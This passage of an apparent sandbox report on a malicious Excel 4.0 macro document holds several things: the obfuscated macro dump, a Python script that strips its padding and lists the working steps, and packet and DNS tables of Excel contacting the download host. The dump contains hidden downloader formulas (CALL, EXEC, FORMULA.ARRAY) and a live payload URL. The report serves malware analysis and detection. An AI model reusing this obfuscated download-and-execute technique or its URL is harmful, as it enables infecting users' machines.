,,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,,,,,,,,,,,,,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)",,,,,,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)=Docs1!$AX$27()",,,,,
=HALT()
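To strip the padding and list the working steps from a dump in this form, the Python below is added here as an illustration; it is not part of the Joe Sandbox report. It parses a shortened excerpt of the macro dump above, embedded as a constructed sample. The splitting logic, category names and the list of "noise" functions are the example's own choices. The cell contents that the CALL and EXEC formulas concatenate (Docs3!BK26, Docs3!BB33 and so on) are not shown on this page, so the script reports the formulas and the literal fragments rather than resolving them.

```python
import csv
import io
import re

# Constructed input: a shortened excerpt of the Excel 4.0 macro dump printed on
# this page. One line per macro-sheet row, cells comma-separated, formula cells
# quoted with doubled inner quotes (CSV conventions).
MACRO_DUMP = (
    ',,,,,,"=ASIN(444114)=ASINH(141)=ASIN(444114)=ASINH(141)'
    '=FORMULA(Docs3!$BE$26&Docs3!$BE$27&Docs3!$BE$28&""n"",BV9)'
    '=ACOS(4244)=EXP(452)=ACOS(4244)=EXP(452)=Docs2!AI20()",,,,'
    '"=ASIN(444114)=ASINH(141)=EXEC(""r""&Docs3!BB33&Docs3!BB37&Docs3!BM23&Docs3!BI33&Docs3!BI36)'
    '=ACOS(42424)=ATAN(4254254)=Docs4!BA9()",,,,,,\n'
    ',,http://,,,"=""php""",,"=""revolet-sa.com/files/countryyelow""",,,'
    '"=ASIN(444114)=ASINH(141)=FORMULA.ARRAY(""U""&Docs3!$BH$26&Docs3!$BH$27&Docs3!$BH$28&Docs3!$BH$29,Docs1!BV10)'
    '=ACOS(4244)=EXP(452)",,'
    '"=ASIN(444114)=CALL(Docs1!BV9,Docs1!BV10,Docs3!BK26&Docs3!BK28,0,'
    'before.3.13.34.sheet!AK14&before.3.13.34.sheet!AK15&Docs3!BP25&before.3.13.34.sheet!AN14,Docs3!BM23,0,0)'
    '=ASIN(444114)=Docs1!$AX$27()",,\n'
    '=HALT()\n'
)

# Side-effect-free math functions chained as padding between the real steps.
NOISE_FUNCS = {"ASIN", "ASINH", "ACOS", "ACOSH", "ATAN", "ATANH", "EXP", "LN",
               "LOG", "SIN", "COS", "TAN", "SQRT", "ABS"}
NOISE_RE = re.compile(r"^=([A-Z]+)\(\d+(?:\.\d+)?\)$")   # =NAME(number) only
TEXT_CELL_RE = re.compile(r'^="([^"]*)"$')                # ="php" style literal cells
EXEC_FUNCS = {"CALL", "EXEC", "REGISTER", "RUN"}
CONTROL_FUNCS = {"HALT", "RETURN", "GOTO"}


def split_formulas(cell):
    """Split '=A(1)=B(2)=C(x,"y")' into its formulas: a new formula starts at
    every '=' seen outside parentheses and outside a string literal."""
    formulas, buf, depth, in_str = [], [], 0, False
    for ch in cell:
        if in_str:
            buf.append(ch)
            in_str = ch != '"'
            continue
        if ch == '"':
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "=" and depth == 0 and buf:
            formulas.append("".join(buf))
            buf = []
        buf.append(ch)
    if buf:
        formulas.append("".join(buf))
    return formulas


def is_noise(formula):
    m = NOISE_RE.match(formula)
    return bool(m) and m.group(1) in NOISE_FUNCS


def formula_name(formula):
    return formula[1:].split("(", 1)[0]


def categorize(name):
    if name in EXEC_FUNCS:
        return "execute"
    if name.startswith("FORMULA"):
        return "write-formula"   # writes a new formula into another cell at run time
    if name in CONTROL_FUNCS:
        return "control"
    if "!" in name:
        return "jump"            # '=Sheet!Cell()' transfers execution to that cell
    return "other"


def analyze(dump):
    """Return the action formulas (padding stripped), the literal string cells the
    macro concatenates from, and how many padding formulas were discarded."""
    actions, literals, noise = [], [], 0
    for row in csv.reader(io.StringIO(dump)):
        for cell in row:
            if not cell:
                continue
            for f in split_formulas(cell):
                if not f.startswith("="):
                    literals.append(f)            # plain text cell, e.g. http://
                    continue
                text = TEXT_CELL_RE.match(f)
                if text:
                    literals.append(text.group(1))
                elif is_noise(f):
                    noise += 1
                else:
                    name = formula_name(f)
                    actions.append({"name": name, "category": categorize(name),
                                    "strings": re.findall(r'"([^"]*)"', f),  # inline literals
                                    "formula": f})
    return {"actions": actions, "literals": literals, "noise_removed": noise}


if __name__ == "__main__":
    result = analyze(MACRO_DUMP)
    print("padding formulas removed:", result["noise_removed"])
    print("literal cells:", result["literals"])
    for a in result["actions"]:
        print(f"[{a['category']:>13}] {a['formula']}")
```

On the excerpt this discards 18 padding formulas, reports the three literal cells http://, php and revolet-sa.com/files/countryyelow (the assembled URL matches the IE cache entry http://revolet-sa.com/files/countryyelow.php recorded under the dropped files), and lists the eight working steps in dump order: FORMULA, a jump to Docs2!AI20, EXEC, a jump to Docs4!BA9, FORMULA.ARRAY, CALL, a jump to Docs1!$AX$27, HALT. The inline strings "U", "r" and "n" are the first characters of longer strings completed from cells not shown here; the report's own UrlDownloadToFile and rundll32 findings indicate what they complete to, but the dump alone does not prove it. A full analysis still needs the other sheets (Docs1 to Docs4 and before.3.13.34.sheet) so the cell references can be resolved.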
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:51:04.744469881 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:04.907798052 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:04.907898903 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:04.908396006 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.069098949 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299613953 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299679041 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299716949 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299757004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299799919 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299849033 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299885988 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299906015 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.299926043 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.299967051 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.300005913 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.300005913 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.300056934 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.310271978 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463424921 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463486910 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463525057 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463565111 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463603973 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463653088 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463690996 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463756084 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463768959 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463795900 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463850021 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463896990 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463951111 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.463953972 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.463998079 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464026928 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464037895 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464077950 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464118004 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464123011 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464157104 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464180946 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464185953 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464229107 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464270115 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464310884 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464339972 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464360952 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464402914 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464441061 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464437008 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464471102 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464489937 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464508057 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464535952 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.464585066 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.464596987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.468918085 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627324104 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627388954 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627420902 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627460003 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627500057 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627540112 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627582073 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627619982 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627660036 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627698898 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627708912 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627749920 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627794027 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627823114 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627834082 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627840042 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627840996 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627872944 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627878904 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627883911 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627907991 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627912045 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.627928019 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627968073 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.627969027 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628002882 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628011942 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628043890 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628051996 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628072977 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628099918 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628118038 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628185987 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628207922 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628249884 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628289938 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628295898 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628328085 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628333092 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628359079 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628367901 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
Apr 7, 2021 05:51:05.628400087 CEST | 49165 | 80 | 192.168.2.22 | 192.232.249.186 |
Apr 7, 2021 05:51:05.628407955 CEST | 80 | 49165 | 192.232.249.186 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 05:51:04.550579071 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 7, 2021 05:51:04.719516039 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 7, 2021 05:51:04.550579071 CEST | 192.168.2.22 | 8.8.8.8 | 0x1168 | Standard query (0) | | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 7, 2021 05:51:04.719516039 CEST | 8.8.8.8 | 192.168.2.22 | 0x1168 | No error (0) | | | 192.232.249.186 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 192.232.249.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 05:51:04.908396006 CEST | 0 | OUT | |
Apr 7, 2021 05:51:05.299613953 CEST | 2 | IN | |